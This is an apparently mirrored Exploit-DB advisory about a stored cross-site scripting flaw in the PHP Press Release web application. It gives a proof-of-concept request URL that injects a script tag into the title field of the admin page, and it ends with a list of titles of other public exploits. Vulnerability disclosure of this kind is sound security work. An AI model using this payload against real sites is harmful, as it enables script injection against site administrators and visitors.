PHP Press Release – Persistent Cross-Site Scripting

Exploit Database
16 阅读

作者： Besim

日期： 2016-10-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40487/

# Exploit Title :PHP Press Release* - Stored Cross Site
Scripting*
# Author : Besim
# Google Dork : -
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
# Software link :
 http://www.pagereactions.com/downloads/phppressrelease.zip


Description : 

Vulnerable link :
http://site_name/phppressrelease/administration.php?pageaction=newrelease

Stored XSS Payload : 

http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active

last Exploits
PHP Press Release – Persistent Cross-Site Scripting的更多信息

Joomla! Component Teams – Multiple Blind SQL Injections：
WordPress Plugin Count Per Day 3.4 – SQL Injection：
fuel CMS 1.4.1 – Remote Code Execution (1)：
GZ Forum Script 1.8 – Stored Cross-Site Scripting (XSS)：
Linksys EA7500 2.0.8.194281 – Cross-Site Scripting：
ZTE ZXHN H108N Router – Configuration Disclosure：
Covenant v0.5 – Remote Code Execution (RCE)：
Discuz! 6.0 – ‘tid’ Cross-Site Scripting：